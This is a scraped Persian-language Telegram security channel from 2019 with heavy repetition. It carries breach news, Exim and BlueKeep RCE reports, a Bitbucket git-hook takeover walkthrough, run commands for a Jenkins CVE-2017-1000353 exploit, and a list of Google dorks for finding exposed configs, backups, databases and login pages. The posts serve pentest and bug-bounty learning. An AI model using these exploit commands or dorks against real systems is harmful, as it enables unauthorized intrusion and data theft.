کشف زیردامنه ها با سرعت بالا
https://github.com/Edu4rdSHL/findomain
#bugbounty
#web
#pentest
@sec_nerd
https://github.com/Edu4rdSHL/findomain
#bugbounty
#web
#pentest
@sec_nerd
نشر اطلاعاتی جدید در فیسبوک!
شماره تلفن های ۴۱۹ میلیون کاربر فیسبوک که در یک دیتابیس محافظت نشده قرار داشت افشا شد.
بیشترین کاربران در این دیتابیس از ایالات متحده با ۱۳۳ میلیون رکورد می باشند.
https://www.hackread.com/unsecured-database-leaks-phone-numbers-of-facebook-users/
#breach
#news
#facebook
@sec_nerd
شماره تلفن های ۴۱۹ میلیون کاربر فیسبوک که در یک دیتابیس محافظت نشده قرار داشت افشا شد.
بیشترین کاربران در این دیتابیس از ایالات متحده با ۱۳۳ میلیون رکورد می باشند.
https://www.hackread.com/unsecured-database-leaks-phone-numbers-of-facebook-users/
#breach
#news
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
How to gain control of #Bitbucket with a TAR archive:
1. An attacker with permissions clones a repository from Bitbucket
2. He uploads a malicious TAR archive as an attachment
3. The import of the archive is triggered
4. After the import of the archive, the malicious git hook is dropped to the repository
5. He creates, adds and commits a file to the repository
6. After pushing, the malicious Git hook is being executed and sensitive data is compromised.
#web
#java
#pentest
@sec_nerd
1. An attacker with permissions clones a repository from Bitbucket
2. He uploads a malicious TAR archive as an attachment
3. The import of the archive is triggered
4. After the import of the archive, the malicious git hook is dropped to the repository
5. He creates, adds and commits a file to the repository
6. After pushing, the malicious Git hook is being executed and sensitive data is compromised.
#web
#java
#pentest
@sec_nerd
🚨🚨🚨🚨🚨🚨🚨🚨🚨🚨
94,504 #BTC (1,018,147,922 USD) transferred from unknown wallet to unknown wallet
Tx:https://whale-alert.io/transaction/bitcoin/4410c8d14ff9f87ceeed1d65cb58e7c7b2422b2d7529afc675208ce2ce09ed7d
#news
#btc
#😩
@sec_nerd
94,504 #BTC (1,018,147,922 USD) transferred from unknown wallet to unknown wallet
Tx:https://whale-alert.io/transaction/bitcoin/4410c8d14ff9f87ceeed1d65cb58e7c7b2422b2d7529afc675208ce2ce09ed7d
#news
#btc
#😩
@sec_nerd
whale-alert.io
Transaction | Whale Alert
Monitor crypto market trends and large transactions with Whale Alert. Set personalized alerts, view live price updates and analyze crypto data through powerful visualizations. Trusted by blockchain enthusiasts to make informed decisions.
آسیب پذیری با شناسه CVE-2019-15846 که در سرورهای Exim کشف شده است به هکرها اجازه میدهد بصورت لوکال و یا از راه دور دستورات را با سطح دسترسی root بر روی سرور آسیب پذیر اجرا کنند.
طبق نتایج جستجوی موتور اینترنت اشیاء shodan بیش از ۵ میلیون سرور در جهان از Exim استفاده میکنند.
https://thehackernews.com/2019/09/exim-email-server-vulnerability.html
#exim
#exploit
#rce
#cpanel
@sec_nerd
طبق نتایج جستجوی موتور اینترنت اشیاء shodan بیش از ۵ میلیون سرور در جهان از Exim استفاده میکنند.
https://thehackernews.com/2019/09/exim-email-server-vulnerability.html
#exim
#exploit
#rce
#cpanel
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
تیم rapid7 ماژول متاسپلویت مربوط به باگ معروف به Bluekeep که با شناسه ی CVE-2019-0708 ثبت شده است را منتشر کرد.
https://github.com/rapid7/metasploit-framework/pull/12283
این آسیب پذیری در ویندوزهای ویستا، هفت، ایکس پی، سرور ۲۰۰۳ و ۲۰۰۸ و در سرویس RDP به هکرها امکان اجرای دستور و یا تکذیب سرویس را میدهد.
توضیحات rapid7:
https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/
توضیحات تک تارگت:
https://searchsecurity.techtarget.com/definition/BlueKeep-CVE-2019-0708
#windows
#exploit
#rdp
#msf
#rce
@sec_nerd
https://github.com/rapid7/metasploit-framework/pull/12283
این آسیب پذیری در ویندوزهای ویستا، هفت، ایکس پی، سرور ۲۰۰۳ و ۲۰۰۸ و در سرویس RDP به هکرها امکان اجرای دستور و یا تکذیب سرویس را میدهد.
توضیحات rapid7:
https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/
توضیحات تک تارگت:
https://searchsecurity.techtarget.com/definition/BlueKeep-CVE-2019-0708
#windows
#exploit
#rdp
#msf
#rce
@sec_nerd
Forwarded from خبرگزاری فارس
Media is too big
VIEW IN TELEGRAM
چه کردی که خاک تو را ای عزیز
از این پس برای شفا میبرند...
❤دشمنت کشت ولی نور تو خاموش نشد❤
🏴🏴فرا رسیدن تاسوعا و عاشورای سرور و سالار آزادمردان امام حسین(ع) بر شما همراهان و تمام مسلمانان جهان تسلیت باد 🏴🏴
@sec_nerd
از این پس برای شفا میبرند...
❤دشمنت کشت ولی نور تو خاموش نشد❤
🏴🏴فرا رسیدن تاسوعا و عاشورای سرور و سالار آزادمردان امام حسین(ع) بر شما همراهان و تمام مسلمانان جهان تسلیت باد 🏴🏴
@sec_nerd
امنیت اطلاعات
تیم rapid7 ماژول متاسپلویت مربوط به باگ معروف به Bluekeep که با شناسه ی CVE-2019-0708 ثبت شده است را منتشر کرد. https://github.com/rapid7/metasploit-framework/pull/12283 این آسیب پذیری در ویندوزهای ویستا، هفت، ایکس پی، سرور ۲۰۰۳ و ۲۰۰۸ و در سرویس RDP به…
https://pentest-tools.com/blog/bluekeep-exploit-metasploit/
نحوه راه اندزای و استفاده از اکسپلویت Bluekeep
#windows
#exploit
#rdp
#msf
#rce
@sec_nerd
نحوه راه اندزای و استفاده از اکسپلویت Bluekeep
#windows
#exploit
#rdp
#msf
#rce
@sec_nerd
Pentest-Tools.com
How to exploit the BlueKeep vulnerability with Metasploit
In this article, we show you a step-by-step tutorial on how to exploit the BlueKeep vulnerability using the Metasploit module.
Forwarded from آزمایشگاه بیتبان | BitBaanLab
⭕️ تیم بیتبان بیش از هزار❗️عدد بدافزار تولیدی توسط شرکت وادی رایمندان را در فضای مجازی شناسایی کرده است.
⭕️ اغلب این بدافزارها در تلگرام و صفحات وب منتشر شدهاند.
⭕️ حجم بدافزارهای شناسایی شده حدود ۱۱.۵ (یازده و نیم❗️) گیگابایت است.
⭕️ تمام این بدافزارها از آدرس زیر در دسترس و قابل دانلود است.
https://malab.bitbaan.com/search/virus-name?keyword=PUP.AndroidOS.IRVAS.Approo
✅ یکی از قابلیتهای پلتفرم تحلیل بیتبان امکان نامگذاری بدافزار و جستجو بر اساس آن است. به عنوان نمونه برای بیش از هزار بدافزار شناسایی شده، خانوادهای با نام
PUP.AndroidOS.IRVAS.Approo
در نظر گرفته شده است. بنابراین میتوان با درج عبارت Approo در بخش جستجوی سامانه به آدرس
https://malab.bitbaan.com/search
به تمام بدافزارهای این خانواده دسترسی پیدا کرد.
⭕️ اغلب این بدافزارها در تلگرام و صفحات وب منتشر شدهاند.
⭕️ حجم بدافزارهای شناسایی شده حدود ۱۱.۵ (یازده و نیم❗️) گیگابایت است.
⭕️ تمام این بدافزارها از آدرس زیر در دسترس و قابل دانلود است.
https://malab.bitbaan.com/search/virus-name?keyword=PUP.AndroidOS.IRVAS.Approo
✅ یکی از قابلیتهای پلتفرم تحلیل بیتبان امکان نامگذاری بدافزار و جستجو بر اساس آن است. به عنوان نمونه برای بیش از هزار بدافزار شناسایی شده، خانوادهای با نام
PUP.AndroidOS.IRVAS.Approo
در نظر گرفته شده است. بنابراین میتوان با درج عبارت Approo در بخش جستجوی سامانه به آدرس
https://malab.bitbaan.com/search
به تمام بدافزارهای این خانواده دسترسی پیدا کرد.
CVE-2017-1000353-1.1-SNAPSHOT-all.jar
1.3 MB
اکسپلویت اجرای دستور از راه دور بر روی Jenkins
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
python3 https://exploit.py https://ip:8080 jenkins_poc.se
https://github.com/vulhub/CVE-2017-1000353
فیلم :
https://asciinema.org/a/pB9D79yD8GVFQYYRKtW88hqm8
#jenkins
#java
#exploit
#rce
@sec_nerd
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
python3 https://exploit.py https://ip:8080 jenkins_poc.se
https://github.com/vulhub/CVE-2017-1000353
فیلم :
https://asciinema.org/a/pB9D79yD8GVFQYYRKtW88hqm8
#jenkins
#java
#exploit
#rce
@sec_nerd
سه رایت آپ جالب نفوذ به وب
https://www.rcesecurity.com/2019/09/H1-4420-From-Quiz-to-Admin-Chaining-Two-0-Days-to-Compromise-an-Uber-Wordpress/
https://blog.evilpacket.net/2019/leveraging-javascript-debuggers/
https://medium.com/@cc1h2e1/write-up-of-two-http-requests-smuggling-ff211656fe7d
#web
#pentest
#writeup
#bugbounty
#wordpress
@sec_nerd
https://www.rcesecurity.com/2019/09/H1-4420-From-Quiz-to-Admin-Chaining-Two-0-Days-to-Compromise-an-Uber-Wordpress/
https://blog.evilpacket.net/2019/leveraging-javascript-debuggers/
https://medium.com/@cc1h2e1/write-up-of-two-http-requests-smuggling-ff211656fe7d
#web
#pentest
#writeup
#bugbounty
#wordpress
@sec_nerd
امنیت اطلاعات
#web #pentest #xss @sec_nerd
ابزار مورد استفاده در این ویدئو
https://securitytraning.com/bugbounty-with-cazador/
#cazador
#web
#pentest
@sec_nerd
https://securitytraning.com/bugbounty-with-cazador/
#cazador
#web
#pentest
@sec_nerd
SSRF | Reading Local Files from DownNotifier server
https://www.openbugbounty.org/blog/leonmugen/ssrf-reading-local-files-from-downnotifier-server/
#ssrf
#web
#pentest
#bugbounty
@sec_nerd
https://www.openbugbounty.org/blog/leonmugen/ssrf-reading-local-files-from-downnotifier-server/
#ssrf
#web
#pentest
#bugbounty
@sec_nerd
نمونه ای از شبکه های Air gapped
https://blog.openshift.com/openshift-4-2-disconnected-install/
#network
#security
@sec_nerd
https://blog.openshift.com/openshift-4-2-disconnected-install/
#network
#security
@sec_nerd
سورس کدهای بانک Scotiabank به اشتباه در گیت هاب برای مدت طولانی در معرض دسترسی عمومی قرار داشت.
این سورس کد شامل کدهای اپلیکیشن موبایل برای امریکای شمالی و مرکزی بود و برخی کلیدها برای دسترسی به منابع بکند و سرویس ها و دیتابیس های این بانک نیز در آن قرار داشت.
https://www.theregister.co.uk/2019/09/18/scotiabank_code_github_leak/
#breach
#bank
#news
@sec_nerd
این سورس کد شامل کدهای اپلیکیشن موبایل برای امریکای شمالی و مرکزی بود و برخی کلیدها برای دسترسی به منابع بکند و سرویس ها و دیتابیس های این بانک نیز در آن قرار داشت.
https://www.theregister.co.uk/2019/09/18/scotiabank_code_github_leak/
#breach
#bank
#news
@sec_nerd
برخی دورک های گوگل برای نفوذ به وب سایتها و کشف اشتباهات پیکربندی
یافتن Directory Listing
site:*.site.com intitle:index.of
یافتن فایلهای کانفیگ
site:*.target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini
یافتن فایلهای دیتابیس و لاگ
site:*.target.com ext:sql | ext:dbf | ext:mdb ext:log
یافتن فایلهای بکاپ
site:*.target.com ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup
یافتن صفحات لاگین
site:*.target.com inurl:login
یافتن پیغام های خطای SQL
site:*.target.com intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected
یافتن اسناد
site:*.target.com ext:doc | ext:docx | ext:odt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv
برخی جستجوهای مفید دیگر
site:*.target.com inurl:adm | dashboard | logout | ...etc
site:*.target.com status | test | session | null | test | system | download | status | version | powered by | etc | expired
https://pentestmag.com/pentest-notes-approaching-a-target/
#web
#pentest
#google
#dork
#bugbounty
@sec_nerd
یافتن Directory Listing
site:*.site.com intitle:index.of
یافتن فایلهای کانفیگ
site:*.target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini
یافتن فایلهای دیتابیس و لاگ
site:*.target.com ext:sql | ext:dbf | ext:mdb ext:log
یافتن فایلهای بکاپ
site:*.target.com ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup
یافتن صفحات لاگین
site:*.target.com inurl:login
یافتن پیغام های خطای SQL
site:*.target.com intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected
یافتن اسناد
site:*.target.com ext:doc | ext:docx | ext:odt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv
برخی جستجوهای مفید دیگر
site:*.target.com inurl:adm | dashboard | logout | ...etc
site:*.target.com status | test | session | null | test | system | download | status | version | powered by | etc | expired
https://pentestmag.com/pentest-notes-approaching-a-target/
#web
#pentest
#dork
#bugbounty
@sec_nerd